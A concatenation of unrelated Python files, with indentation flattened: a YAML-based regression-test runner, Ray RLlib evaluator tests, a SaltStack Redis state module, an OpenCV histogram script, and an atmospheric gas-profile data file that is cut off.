# use the fast, LibYAML-based variants, if not, use the slow pure-Python
# versions.
BaseYAMLLoader = yaml.SafeLoader
if hasattr(yaml, 'CSafeLoader'):
BaseYAMLLoader = yaml.CSafeLoader
BaseYAMLDumper = yaml.SafeDumper
if hasattr(yaml, 'CSafeDumper'):
BaseYAMLDumper = yaml.CSafeDumper
class RegressYAMLLoader(BaseYAMLLoader):
"""
Loads test data from a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file contains input records.
`with_output` (Boolean)
Indicates that the YAML file contains output records.
`stream` (a file or a file-like object)
The YAML stream.
"""
# A pattern to match substitution variables in `!environ` nodes.
environ_pattern = r"""
\$ \{
(?P<name> [a-zA-Z_][0-9a-zA-Z_.-]*)
(?: : (?P<default> [0-9A-Za-z~@#^&*_;:,./?=+-]*) )?
\}
"""
environ_regexp = re.compile(environ_pattern, re.X)
# A pattern for valid values of substitution variables.
environ_value_pattern = r"""^ [0-9A-Za-z~@#^&*_;:,./?=+-]* $"""
environ_value_regexp = re.compile(environ_value_pattern, re.X)
def __init__(self, routine, with_input, with_output, stream):
super(RegressYAMLLoader, self).__init__(stream)
self.routine = routine
# The list of permitted record classes.
self.records = []
# A mapping of record_class -> case_class.
self.case_by_record = {}
# A mapping of record_class -> the set of all attributes.
self.all_keys_by_record = {}
# A mapping of record_class -> the set of mandatory attributes.
self.mandatory_keys_by_record = {}
# Generate a list of permitted record classes.
self.init_records(with_input, with_output)
def init_records(self, with_input, with_output):
# Gather the record classes from the available test cases.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.append(case_class.Input)
self.case_by_record[case_class.Input] = case_class
if with_output and case_class.Output is not None:
self.records.append(case_class.Output)
self.case_by_record[case_class.Output] = case_class
# For each record class, prepare the set of all attributes and
# the set of mandatory attributes.
for record_class in self.records:
all_keys = set()
for field in record_class.fields:
if field.is_any:
all_keys = None
break
all_keys.add(field.attribute.replace('_', '-'))
self.all_keys_by_record[record_class] = all_keys
mandatory_keys = set()
for field in record_class.fields:
if field.is_any or not field.is_mandatory:
continue
mandatory_keys.add(field.attribute.replace('_', '-'))
if not mandatory_keys:
mandatory_keys = None
self.mandatory_keys_by_record[record_class] = mandatory_keys
def load(self):
"""
Loads test data from the YAML stream.
"""
# That ensures the stream contains one document, parses it and
# returns the corresponding object.
return self.get_single_data()
def construct_document(self, node):
# We override this to ensure that any produced document is
# a test record of expected type.
data = super(RegressYAMLLoader, self).construct_document(node)
if type(data) not in self.records:
raise yaml.constructor.ConstructorError(None, None,
"unexpected document type",
node.start_mark)
return data
def construct_yaml_str(self, node):
# Always convert a `!!str` scalar node to a byte string.
# By default, PyYAML converts an `!!str`` node containing non-ASCII
# characters to a Unicode string.
value = self.construct_scalar(node)
value = value.encode('utf-8')
return value
def construct_yaml_map(self, node):
# Detect if a node represent test data and convert it to a test record.
# We assume that the node represents a test record if it contains
# all mandatory keys of the record class. Otherwise, we assume it
# is a regular dictionary.
#
# It would be much better to perform this detection on the tag
# resolution phase. However this phase does not give us access
# to the mapping keys, so we have no choice but do it during the
# construction phase.
# Check if we got a mapping node.
if not isinstance(node, yaml.MappingNode):
raise yaml.constructor.ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
# Objects corresponding to the key nodes.
keys = []
# Objects corresponding to the value nodes.
values = []
# The mapping of key object -> value object.
value_by_key = {}
# The mapping of key object -> the mark of the key node.
key_mark_by_key = {}
# The mapping of key object -> the mark of the value node.
value_mark_by_key = {}
# Convert the key and the value nodes.
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=True)
try:
hash(key)
except TypeError as exc:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
"found unacceptable key (%s)" % exc,
key_node.start_mark)
keys.append(key)
value = self.construct_object(value_node, deep=True)
values.append(value)
value_by_key[key] = value
key_mark_by_key[key] = key_node.start_mark
value_mark_by_key[key] = value_node.start_mark
# Find a record class such that the node contains all
# the mandatory record fields.
detected_record_class = None
key_set = set(keys)
for record_class in self.records:
mandatory_keys = self.mandatory_keys_by_record[record_class]
if mandatory_keys is None:
continue
if key_set.issuperset(mandatory_keys):
detected_record_class = record_class
break
# If we can't find a suitable record class, it must be a regular
# dictionary.
if detected_record_class is None:
return dict(list(zip(keys, values)))
# Check that the node does not contain any keys other than
# the record fields.
all_keys = self.all_keys_by_record[detected_record_class]
if all_keys is not None:
for key in keys:
if key not in all_keys:
raise yaml.constructor.ConstructorError(None, None,
"unexpected key %r; expected one of %s"
% (key, ", ".join(sorted(all_keys))),
key_mark_by_key[key])
# Generate the record attributes: validate and normalize
# the field values.
attributes = {}
for field in detected_record_class.fields:
if field.is_any:
continue
key = field.attribute.replace('_', '-')
if key in value_by_key:
value = value_by_key[key]
try:
value = field.val(value)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid field %r (%s)" % (key, exc),
value_mark_by_key[key])
else:
value = field.default
attributes[field.attribute] = value
# Record where the node was found.
location = "\"%s\", line %s" \
% (node.start_mark.name, node.start_mark.line+1)
# Instantiate and return the test record.
case_class = self.case_by_record[detected_record_class]
try:
record = detected_record_class(self.routine, case_class,
attributes, location)
except ValueError as exc:
raise yaml.constructor.ConstructorError(None, None,
"invalid test data (%s)" % exc,
node.start_mark)
return record
def construct_environ(self, node):
# Substitute environment variables in `!environ` scalars.
def replace(match):
# Substitute environment variables with values.
name = match.group('name')
default = match.group('default') or ''
value = os.environ.get(name, default)
if not self.environ_value_regexp.match(value):
raise yaml.constructor.ConstructorError(None, None,
"invalid value of environment variable %s: %r"
% (name, value), node.start_mark)
return value
# Get the scalar value and replace all ${...} occurences with
# values of respective environment variables.
value = self.construct_scalar(node)
value = value.encode('utf-8')
value = self.environ_regexp.sub(replace, value)
# Blank values are returned as `None`.
if not value:
return None
return value
# Register custom constructors for `!!str``, `!!map`` and ``!environ``.
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:str',
RegressYAMLLoader.construct_yaml_str)
RegressYAMLLoader.add_constructor(
'tag:yaml.org,2002:map',
RegressYAMLLoader.construct_yaml_map)
RegressYAMLLoader.add_constructor(
'!environ',
RegressYAMLLoader.construct_environ)
# Register a resolver for ``!environ``.
RegressYAMLLoader.add_implicit_resolver(
'!environ', RegressYAMLLoader.environ_regexp, ['$'])
class RegressYAMLDumper(BaseYAMLDumper):
"""
Dumps test data to a YAML file.
`routine` (:class:`RegressRoutine`)
The testing engine.
`with_input` (Boolean)
Indicates that the YAML file will contain input records.
`with_output` (Boolean)
Indicates that the YAML file will contain output records.
`stream` (a file or a file-like object)
The stream where the YAML document is written.
"""
def __init__(self, routine, with_input, with_output, stream, **keywords):
# FIXME: we don't really need extra `with_*` parameters, this
# constructor is always called with with_input=False, with_output=True.
super(RegressYAMLDumper, self).__init__(stream, **keywords)
self.routine = routine
# The set of permitted record classes.
self.records = set()
# Gather the permitted record classes.
self.init_records(with_input, with_output)
# Check if the PyYAML version is suitable for dumping.
self.check_version()
def init_records(self, with_input, with_output):
# Gather permitted record classes.
for case_class in self.routine.cases:
if with_input and case_class.Input is not None:
self.records.add(case_class.Input)
if with_output and case_class.Output is not None:
self.records.add(case_class.Output)
def check_version(self):
# We require PyYAML >= 3.07 built with LibYAML >= 0.1.2 to dump
# YAML data. Other versions may produce slightly different output.
# Since the YAML files may be kept in a VCS repository, we don't
# want minor formatting changes generate unnecessarily large diffs.
try:
pyyaml_version = yaml.__version__
except AttributeError:
pyyaml_version = '3.05'
try:
import _yaml
libyaml_version = _yaml.get_version_string()
except ImportError:
libyaml_version = None
if pyyaml_version < '3.07':
raise ScriptError("PyYAML >= 3.07 is required"
" to dump test output")
if libyaml_version is None:
raise ScriptError("PyYAML built with LibYAML bindings"
" is required to dump test output")
if libyaml_version < '0.1.2':
raise ScriptError("LibYAML >= 0.1.2 is required"
" to dump test output")
def dump(self, data):
"""
Dumps the data to the YAML stream.
"""
self.open()
self.represent(data)
self.close()
def represent_str(self, data):
# Serialize a string. We override the default string serializer
# to use the literal block style for multi-line strings.
tag = None
style = None
if data.endswith('\n'):
style = '|'
tag = 'tag:yaml.org,2002:str'
return self.represent_scalar(tag, data, style=style)
def represent_record(self, data):
# Complain when given a record of unexpected type.
if type(data) not in self.records:
return super(RegressYAMLDumper, self).represent_undefined(data)
# Extract the fields skipping those with the default value.
mapping = []
for field in data.fields:
if field.is_any:
continue
name = field.attribute.replace('_', '-')
value = getattr(data, field.attribute)
if value == field.default:
continue
mapping.append((name, value))
# Generate a mapping node.
return self.represent_mapping('tag:yaml.org,2002:map', mapping,
flow_style=False)
# Register custom representers for `str` and `TestData`.
RegressYAMLDumper.add_representer(
str, RegressYAMLDumper.represent_str)
RegressYAMLDumper.add_multi_representer(
TestData, RegressYAMLDumper.represent_record)
class RegressRoutine(Routine):
"""
Implements the `regress` routine.
"""
name = 'regress'
aliases = ['test']
arguments = [
Argument('suites', SeqVal(StrVal()), None, is_list=True),
]
options = [
InputOption,
TrainOption,
PurgeOption,
ForceOption,
QuietOption,
]
hint = """run regression tests"""
help = """
This routine runs a series of test cases.
A test case takes input data and produces output data. The test
succeeds if it runs without errors and its output data coincides with
the expected output.
Input and output test data are stored in the YAML format. Run
'%(executable)s help regress <case>' to get the description of the
format for a specific test type.
Test cases are organized into suites. A test suite is a special type of
a test case that contains other test cases.
By default, the routine executes all tests in the given YAML file. To
run only specific test suites, list their identifiers in the command
line.
Unless option `--force` is used, the testing process will halt on the
first test failure.
The routine reads the input data from the standard input stream. Use
option `--input FILE` to read the input data from a file instead.
The routine supports training mode, in which it allows you to add
expected output for new tests and updated expected output for existing
tests. Use option `--train` to run the routine in the training mode.
When a test case is removed, the routine does not remove obsolete
expected output records automatically. Use option `--purge` to remove
stale output records.
By default, the routine prints the header of every executed tests. Use
option `--quiet` to print only errors and final statistics.
"""
# This text is written to YAML files generated by the routine.
output_help = """
#
# This file contains expected test output data for regression tests.
# It was generated automatically by the `regress` routine.
#
"""
# List of supported types of test cases.
cases = [
AppTestCase,
LoadAppTestCase,
DefineTestCase,
IncludeTestCase,
SuiteTestCase,
QueryTestCase,
CtlTestCase,
StartCtlTestCase,
EndCtlTestCase,
PythonCodeTestCase,
PythonCodeIncludeTestCase,
SQLTestCase,
SQLIncludeTestCase,
WriteToFileTestCase,
ReadFromFileTestCase,
RemoveFilesTestCase,
MakeDirTestCase,
RemoveDirTestCase,
]
# Represents the mutable state of the testing process.
state_class = TestState
@classmethod
def get_help(cls, **substitutes):
"""
Returns a long description of the routine.
"""
# Produce routine description of the form:
# {help}
#
# Test cases: (run ... for more help)
# {case.name} : {case.hint}
# ...
lines = []
help = super(RegressRoutine, cls).get_help(**substitutes)
if help is not None:
lines.append(help)
if cls.cases:
if lines:
lines.append("")
lines.append("Test cases:"
" (run '%(executable)s help regress <case>'"
" for more help)" % substitutes)
for case_class in cls.cases:
case_name = case_class.name
case_hint = case_class.get_hint()
if case_hint is not None:
lines.append(" %-24s : %s" % (case_name, case_hint))
else:
lines.append(" %s" % case_name)
return "\n".join(lines)
@classmethod
def get_feature(cls, name):
"""
Finds the test case by name.
"""
for case_class in cls.cases:
if case_class.name == name:
return case_class
raise ScriptError("unknown test case %r" % name)
def run(self):
# Get the test input data.
input = self.load_input(self.input)
# Initialize the testing state.
state = self.state_class()
# Create a test case.
case = input.case_class(self, state, input, None)
# Check if all test suites specified by the user exist.
if self.suites:
available_suites = case.get_suites()
for suite in self.suites:
if suite not in available_suites:
raise ScriptError("unknown suite %r" % suite)
# Start the testing in the selected mode.
if self.train:
case.train()
else:
case.verify()
# Display the statistics.
self.ctl.out("="*72)
if state.passed:
self.ctl.out("TESTS PASSED: %s" % state.passed)
if state.failed:
self.ctl.out("TESTS FAILED: %s" % state.failed)
if state.updated:
self.ctl.out("TESTS UPDATED: %s" % state.updated)
self.ctl.out()
# Produce a fatal error if at least one test failed.
if state.failed:
if state.failed == 1:
message = "a test failed"
else:
message = "%s tests failed" % state.failed
raise ScriptError(message)
def load_input(self, path):
# Load test input data from a file. If `path` is `None`,
# load from the standard input.
assert isinstance(path, maybe(str))
if path is not None:
stream = open(path, 'rb')
else:
stream = self.ctl.stdin
loader = RegressYAMLLoader(self, True, False, stream)
try:
input = loader.load()
except yaml.YAMLError as exc:
raise ScriptError("failed to load test input data: %s" % exc)
return input
def load_output(self, path):
# Load test output data from a file.
assert isinstance(path, str)
stream = open(path, 'rb')
loader = RegressYAMLLoader(self, False, True, stream)
try:
input = loader.load()
except yaml.YAMLError as exc:
raise ScriptError("failed to load test output data: %s" % exc)
return input
def save_output(self, path, output):
# Serialize and write test output data to a file.
assert isinstance(path, str)
assert isinstance(output, TestData)
stream = open(path, 'wb')
if self.output_help is not None:
self.ctl.out(trim_doc(self.output_help), file=stream)
self.ctl.out(file=stream)
dumper = RegressYAMLDumper(self, False, True, stream)
try:
dumper.dump(output)
except yaml.YAMLError as exc:
raise ScriptError("failed to write test output data: %s" % exc)
|
python
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import gym
import shutil
import tempfile
import ray
from ray.rllib.a3c import DEFAULT_CONFIG
from ray.rllib.a3c.a3c_evaluator import A3CEvaluator
from ray.rllib.dqn.dqn_evaluator import adjust_nstep
from ray.tune.registry import get_registry
class DQNEvaluatorTest(unittest.TestCase):
def testNStep(self):
obs = [1, 2, 3, 4, 5, 6, 7]
actions = ["a", "b", "a", "a", "a", "b", "a"]
rewards = [10.0, 0.0, 100.0, 100.0, 100.0, 100.0, 100000.0]
new_obs = [2, 3, 4, 5, 6, 7, 8]
dones = [1, 0, 0, 0, 0, 1, 0]
adjust_nstep(3, 0.9, obs, actions, rewards, new_obs, dones)
self.assertEqual(obs, [1, 2, 3, 4, 5])
self.assertEqual(actions, ["a", "b", "a", "a", "a"])
self.assertEqual(rewards, [10.0, 171.0, 271.0, 271.0, 190.0])
self.assertEqual(new_obs, [2, 5, 6, 7, 7])
self.assertEqual(dones, [1, 0, 0, 0, 0])
class A3CEvaluatorTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=1)
config = DEFAULT_CONFIG.copy()
config["num_workers"] = 1
config["observation_filter"] = "ConcurrentMeanStdFilter"
config["reward_filter"] = "MeanStdFilter"
config["batch_size"] = 2
self._temp_dir = tempfile.mkdtemp("a3c_evaluator_test")
self.e = A3CEvaluator(
get_registry(),
lambda config: gym.make("CartPole-v0"),
config,
logdir=self._temp_dir)
def tearDown(self):
ray.worker.cleanup()
shutil.rmtree(self._temp_dir)
def sample_and_flush(self):
e = self.e
self.e.sample()
filters = e.get_filters(flush_after=True)
obs_f = filters["obs_filter"]
rew_f = filters["rew_filter"]
self.assertNotEqual(obs_f.rs.n, 0)
self.assertNotEqual(obs_f.buffer.n, 0)
self.assertNotEqual(rew_f.rs.n, 0)
self.assertNotEqual(rew_f.buffer.n, 0)
return obs_f, rew_f
def testGetFilters(self):
e = self.e
obs_f, rew_f = self.sample_and_flush()
COUNT = obs_f.rs.n
filters = e.get_filters(flush_after=False)
obs_f = filters["obs_filter"]
NEW_COUNT = obs_f.rs.n
self.assertGreaterEqual(NEW_COUNT, COUNT)
self.assertLessEqual(obs_f.buffer.n, NEW_COUNT - COUNT)
def testSyncFilter(self):
"""Show that sync_filters rebases own buffer over input"""
e = self.e
obs_f, _ = self.sample_and_flush()
# Current State
filters = e.get_filters(flush_after=False)
obs_f = filters["obs_filter"]
rew_f = filters["rew_filter"]
self.assertLessEqual(obs_f.buffer.n, 20)
new_obsf = obs_f.copy()
new_obsf.rs._n = 100
e.sync_filters({"obs_filter": new_obsf, "rew_filter": rew_f})
filters = e.get_filters(flush_after=False)
obs_f = filters["obs_filter"]
self.assertGreaterEqual(obs_f.rs.n, 100)
self.assertLessEqual(obs_f.buffer.n, 20)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
python
|
# -*- coding: utf-8 -*-
"""
Management of Redis server
==========================
.. versionadded:: 2014.7.0
:depends: - redis Python module
:configuration: See :py:mod:`salt.modules.redis` for setup instructions.
.. code-block:: yaml
key_in_redis:
redis.string:
- value: string data
The redis server information specified in the minion config file can be
overridden in states using the following arguments: ``host``, ``post``, ``db``,
``password``.
.. code-block:: yaml
key_in_redis:
redis.string:
- value: string data
- host: localhost
- port: 6379
- db: 0
- password: somuchkittycat
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
__virtualname__ = "redis"
def __virtual__():
"""
Only load if the redis module is in __salt__
"""
if "redis.set_key" in __salt__:
return __virtualname__
return (False, "redis module could not be loaded")
def string(name, value, expire=None, expireat=None, **connection_args):
"""
Ensure that the key exists in redis with the value specified
name
Redis key to manage
value
Data to persist in key
expire
Sets time to live for key in seconds
expireat
Sets expiration time for key via UNIX timestamp, overrides `expire`
"""
ret = {
"name": name,
"changes": {},
"result": True,
"comment": "Key already set to defined value",
}
old_key = __salt__["redis.get_key"](name, **connection_args)
if old_key != value:
__salt__["redis.set_key"](name, value, **connection_args)
ret["changes"][name] = "Value updated"
ret["comment"] = "Key updated to new value"
if expireat:
__salt__["redis.expireat"](name, expireat, **connection_args)
ret["changes"]["expireat"] = "Key expires at {0}".format(expireat)
elif expire:
__salt__["redis.expire"](name, expire, **connection_args)
ret["changes"]["expire"] = "TTL set to {0} seconds".format(expire)
return ret
def absent(name, keys=None, **connection_args):
"""
Ensure key absent from redis
name
Key to ensure absent from redis
keys
list of keys to ensure absent, name will be ignored if this is used
"""
ret = {
"name": name,
"changes": {},
"result": True,
"comment": "Key(s) specified already absent",
}
if keys:
if not isinstance(keys, list):
ret["result"] = False
ret["comment"] = "`keys` not formed as a list type"
return ret
delete_list = [
key for key in keys if __salt__["redis.exists"](key, **connection_args)
]
if not delete_list:
return ret
__salt__["redis.delete"](*delete_list, **connection_args)
ret["changes"]["deleted"] = delete_list
ret["comment"] = "Keys deleted"
return ret
if __salt__["redis.exists"](name, **connection_args):
__salt__["redis.delete"](name, **connection_args)
ret["comment"] = "Key deleted"
ret["changes"]["deleted"] = [name]
return ret
def slaveof(
name,
sentinel_host=None,
sentinel_port=None,
sentinel_password=None,
**connection_args
):
"""
Set this redis instance as a slave.
.. versionadded: 2016.3.0
name
Master to make this a slave of
sentinel_host
Ip of the sentinel to check for the master
sentinel_port
Port of the sentinel to check for the master
"""
ret = {
"name": name,
"changes": {},
"result": False,
"comment": "Failed to setup slave",
}
kwargs = copy.copy(connection_args)
sentinel_master = __salt__["redis.sentinel_get_master_ip"](
name, sentinel_host, sentinel_port, sentinel_password
)
if sentinel_master["master_host"] in __salt__["network.ip_addrs"]():
ret["result"] = True
ret["comment"] = "Minion is the master: {0}".format(name)
return ret
first_master = __salt__["redis.get_master_ip"](**connection_args)
if first_master == sentinel_master:
ret["result"] = True
ret["comment"] = "Minion already slave of master: {0}".format(name)
return ret
if __opts__["test"] is True:
ret["comment"] = "Minion will be made a slave of {0}: {1}".format(
name, sentinel_master["host"]
)
ret["result"] = None
return ret
kwargs.update(**sentinel_master)
__salt__["redis.slaveof"](**kwargs)
current_master = __salt__["redis.get_master_ip"](**connection_args)
if current_master != sentinel_master:
return ret
ret["result"] = True
ret["changes"] = {
"old": first_master,
"new": current_master,
}
ret["comment"] = "Minion successfully connected to master: {0}".format(name)
return ret
|
python
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
img = cv2.imread('canyon.png')
gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
values = []
for i in range(256):
n = np.where(gray_img == i, 1., 0.).sum()
values.append(n)
plt.bar(range(256), height=values, width=1.)
plt.xlabel('intensity')
plt.ylabel('pixels')
plt.savefig('chart.png')
|
python
|
"""
Profile ../profile-datasets-py/div83/023.py
file automaticaly created by prof_gen.py script
"""
self["ID"] = "../profile-datasets-py/div83/023.py"
self["Q"] = numpy.array([ 2.79844200e+00, 3.21561000e+00, 4.08284300e+00,
4.76402700e+00, 4.58551900e+00, 4.69499800e+00,
5.22973300e+00, 5.84156600e+00, 6.18858200e+00,
6.21784100e+00, 6.21911100e+00, 6.16721200e+00,
6.00577400e+00, 5.67508800e+00, 5.23121300e+00,
4.81113700e+00, 4.55030900e+00, 4.39987100e+00,
4.29931200e+00, 4.22282200e+00, 4.15552300e+00,
4.09809300e+00, 4.04698400e+00, 4.00343400e+00,
3.96829400e+00, 3.94125400e+00, 3.91683500e+00,
3.89245500e+00, 3.87021500e+00, 3.85012500e+00,
3.83217500e+00, 3.82010500e+00, 3.81511500e+00,
3.81423500e+00, 3.81682500e+00, 3.82262500e+00,
3.83055500e+00, 3.84032500e+00, 3.85492500e+00,
3.87799500e+00, 3.90433500e+00, 3.92437500e+00,
3.94598400e+00, 3.97470400e+00, 4.01590400e+00,
4.04815400e+00, 4.03697400e+00, 4.03236400e+00,
4.03976400e+00, 4.14153300e+00, 4.59046900e+00,
5.41755100e+00, 6.21536100e+00, 7.46027400e+00,
9.47053000e+00, 1.24248500e+01, 1.70469100e+01,
2.38214300e+01, 2.79383200e+01, 3.07220600e+01,
3.31475000e+01, 3.59911000e+01, 3.99466000e+01,
4.64855400e+01, 5.73845100e+01, 7.41050100e+01,
1.02426500e+02, 1.38336900e+02, 1.73875800e+02,
2.01908200e+02, 2.49736600e+02, 3.41031700e+02,
4.82377200e+02, 6.08759200e+02, 6.98893200e+02,
7.49942200e+02, 6.57168800e+02, 5.95259500e+02,
5.49234200e+02, 3.84860800e+02, 2.39486600e+02,
1.34069000e+02, 1.01649700e+02, 1.26293000e+02,
1.82372700e+02, 2.29509300e+02, 3.02564400e+02,
4.86049600e+02, 6.92652900e+02, 1.47797200e+03,
2.63994200e+03, 3.37610300e+03, 3.89369000e+03,
4.35807400e+03, 5.44476200e+03, 6.95739600e+03,
7.05270600e+03, 7.76016900e+03, 7.54917600e+03,
7.34658800e+03, 7.15201000e+03])
self["P"] = numpy.array([ 5.00000000e-03, 1.61000000e-02, 3.84000000e-02,
7.69000000e-02, 1.37000000e-01, 2.24400000e-01,
3.45400000e-01, 5.06400000e-01, 7.14000000e-01,
9.75300000e-01, 1.29720000e+00, 1.68720000e+00,
2.15260000e+00, 2.70090000e+00, 3.33980000e+00,
4.07700000e+00, 4.92040000e+00, 5.87760000e+00,
6.95670000e+00, 8.16550000e+00, 9.51190000e+00,
1.10038000e+01, 1.26492000e+01, 1.44559000e+01,
1.64318000e+01, 1.85847000e+01, 2.09224000e+01,
2.34526000e+01, 2.61829000e+01, 2.91210000e+01,
3.22744000e+01, 3.56505000e+01, 3.92566000e+01,
4.31001000e+01, 4.71882000e+01, 5.15278000e+01,
5.61260000e+01, 6.09895000e+01, 6.61253000e+01,
7.15398000e+01, 7.72396000e+01, 8.32310000e+01,
8.95204000e+01, 9.61138000e+01, 1.03017000e+02,
1.10237000e+02, 1.17778000e+02, 1.25646000e+02,
1.33846000e+02, 1.42385000e+02, 1.51266000e+02,
1.60496000e+02, 1.70078000e+02, 1.80018000e+02,
1.90320000e+02, 2.00989000e+02, 2.12028000e+02,
2.23442000e+02, 2.35234000e+02, 2.47408000e+02,
2.59969000e+02, 2.72919000e+02, 2.86262000e+02,
3.00000000e+02, 3.14137000e+02, 3.28675000e+02,
3.43618000e+02, 3.58966000e+02, 3.74724000e+02,
3.90893000e+02, 4.07474000e+02, 4.24470000e+02,
4.41882000e+02, 4.59712000e+02, 4.77961000e+02,
4.96630000e+02, 5.15720000e+02, 5.35232000e+02,
5.55167000e+02, 5.75525000e+02, 5.96306000e+02,
6.17511000e+02, 6.39140000e+02, 6.61192000e+02,
6.83667000e+02, 7.06565000e+02, 7.29886000e+02,
7.53628000e+02, 7.77790000e+02, 8.02371000e+02,
8.27371000e+02, 8.52788000e+02, 8.78620000e+02,
9.04866000e+02, 9.31524000e+02, 9.58591000e+02,
9.86067000e+02, 1.01395000e+03, 1.04223000e+03,
1.07092000e+03, 1.10000000e+03])
self["CO2"] = numpy.array([ 375.11 , 375.1098, 375.1095, 375.1092, 375.1103, 375.1112,
375.102 , 375.0748, 375.0387, 375.0027, 374.9657, 374.9347,
374.9347, 374.9779, 375.066 , 375.2462, 375.4553, 375.5563,
375.5914, 375.6144, 375.6834, 375.7585, 375.8175, 375.8015,
375.8185, 375.8575, 375.9295, 376.0125, 376.1415, 376.2736,
376.3256, 376.3816, 376.4906, 376.6096, 376.7786, 376.9766,
377.1776, 377.3716, 377.5755, 377.9805, 378.4275, 378.9005,
379.4005, 379.9165, 379.9895, 380.0655, 380.1185, 380.1515,
380.1955, 380.3004, 380.4083, 380.4939, 380.5716, 380.6732,
380.8284, 380.9903, 381.1505, 381.3149, 381.4673, 381.6093,
381.7373, 381.8043, 381.8727, 381.8402, 381.7941, 381.6917,
381.5509, 381.4192, 381.3097, 381.212 , 381.1708, 381.112 ,
381.0581, 381.0109, 380.9795, 380.9641, 380.9895, 380.9991,
380.9846, 381.0113, 381.0177, 381.0059, 380.9633, 380.8999,
380.8305, 380.7756, 380.7188, 380.6409, 380.5542, 380.2432,
379.7768, 379.4616, 379.2207, 379.007 , 378.5665, 377.9679,
377.9128, 377.6306, 377.703 , 377.7771, 377.8511])
self["CO"] = numpy.array([ 0.2633713 , 0.2658481 , 0.2708949 , 0.2798357 , 0.2943857 ,
0.3169055 , 0.3270093 , 0.3025382 , 0.2106017 , 0.1228242 ,
0.07192025, 0.04720251, 0.02749763, 0.0176824 , 0.01330503,
0.01175584, 0.01216294, 0.01235085, 0.01191595, 0.01109635,
0.01048156, 0.01065176, 0.01107116, 0.01118836, 0.01095626,
0.01048936, 0.01037516, 0.01030036, 0.01028216, 0.01026766,
0.01031526, 0.01036646, 0.01061996, 0.01090526, 0.01135316,
0.01191435, 0.01257265, 0.01338555, 0.01430114, 0.01698863,
0.02058872, 0.0247199 , 0.02928728, 0.03486766, 0.03547156,
0.03611435, 0.03603435, 0.03538126, 0.03486586, 0.03537075,
0.03590374, 0.0365283 , 0.03721557, 0.03815132, 0.03968272,
0.04133349, 0.04397005, 0.04697288, 0.04988211, 0.05270888,
0.05543176, 0.05699425, 0.05865026, 0.05972622, 0.06078511,
0.06102698, 0.06077157, 0.0600102 , 0.05846103, 0.05707617,
0.05641971, 0.05576448, 0.05575019, 0.05573665, 0.05577429,
0.05582021, 0.05583748, 0.05584664, 0.05582452, 0.05580362,
0.05573265, 0.05565114, 0.05552915, 0.0553906 , 0.05522743,
0.05502187, 0.05479002, 0.05452069, 0.05428088, 0.05400267,
0.05363653, 0.05297076, 0.05227825, 0.0516777 , 0.0512194 ,
0.0509122 , 0.05080981, 0.05063281, 0.05016561, 0.04969551,
0.04922292])
self["T"] = numpy.array([ 197.556, 205.148, 219.995, 240.314, 257.486, 264.952,
260.228, 247.287, 234.817, 228.724, 228.789, 228.982,
226.537, 222.31 , 217.705, 214.27 , 211.775, 209.309,
207.224, 206.093, 206.618, 207.997, 209.315, 210.38 ,
211.099, 211.505, 211.873, 212.371, 213.051, 213.908,
214.837, 215.571, 216.029, 216.031, 215.881, 215.892,
216.224, 216.699, 216.908, 216.703, 216.372, 216.338,
216.472, 216.439, 216.209, 216.181, 216.454, 216.965,
217.694, 218.094, 218.032, 217.803, 217.179, 215.873,
214.502, 213.833, 213.502, 212.442, 212.136, 212.741,
213.98 , 215.429, 216.953, 218.865, 221.017, 223.335,
225.768, 228.287, 230.855, 233.441, 235.821, 238.02 ,
240.023, 242.129, 244.298, 246.531, 248.765, 250.979,
253.162, 255.179, 257.081, 258.906, 260.675, 262.335,
263.83 , 265.078, 265.993, 266.655, 267.483, 267.492,
267.496, 268.771, 270.518, 272.394, 274.203, 275.936,
278.184, 279.876, 279.876, 279.876, 279.876])
self["N2O"] = numpy.array([ 0.00066 , 0.00066 , 0.00066 , 0.00170999, 0.00157999,
0.00117 , 0.00102 , 0.00093999, 0.00109999, 0.00186999,
0.00278998, 0.00385998, 0.00502997, 0.00794995, 0.01126994,
0.01598992, 0.0223999 , 0.03255986, 0.04303981, 0.05860975,
0.07344969, 0.09338962, 0.1153595 , 0.1364095 , 0.1593194 ,
0.1816793 , 0.2032092 , 0.2216691 , 0.2387291 , 0.255199 ,
0.269519 , 0.2770789 , 0.2843989 , 0.2914989 , 0.2959989 ,
0.2990189 , 0.3018688 , 0.3031288 , 0.3042188 , 0.3052488 ,
0.3062088 , 0.3071688 , 0.3081388 , 0.3091188 , 0.3100888 ,
0.3110487 , 0.3119987 , 0.3129287 , 0.3138187 , 0.3146787 ,
0.3154986 , 0.3162583 , 0.316948 , 0.3175776 , 0.318107 ,
0.318326 , 0.3185246 , 0.3187024 , 0.3188511 , 0.3189802 ,
0.3190694 , 0.3191285 , 0.3191473 , 0.3191452 , 0.3191417 ,
0.3191363 , 0.3191273 , 0.3191158 , 0.3191045 , 0.3190956 ,
0.3190803 , 0.3190512 , 0.319006 , 0.3189657 , 0.3189369 ,
0.3189206 , 0.3189503 , 0.31897 , 0.3189847 , 0.3190372 ,
0.3190836 , 0.3191172 , 0.3191276 , 0.3191197 , 0.3191018 ,
0.3190867 , 0.3190634 , 0.3190049 , 0.3189389 , 0.3186883 ,
0.3183174 , 0.3180825 , 0.3179173 , 0.3177691 , 0.3174222 ,
0.3169395 , 0.3169091 , 0.3166833 , 0.3167506 , 0.3168153 ,
0.3168774 ])
self["O3"] = numpy.array([ 0.1701035 , 0.1775344 , 0.2070442 , 0.3108455 , 0.4857418 ,
0.7174716 , 1.135664 , 1.854109 , 2.782353 , 3.737137 ,
4.530402 , 5.187768 , 5.835555 , 6.478703 , 7.042913 ,
7.406004 , 7.476306 , 7.470997 , 7.415398 , 7.330429 ,
7.24153 , 7.137661 , 6.989612 , 6.787533 , 6.528764 ,
6.220455 , 5.884567 , 5.503819 , 5.09551 , 4.693582 ,
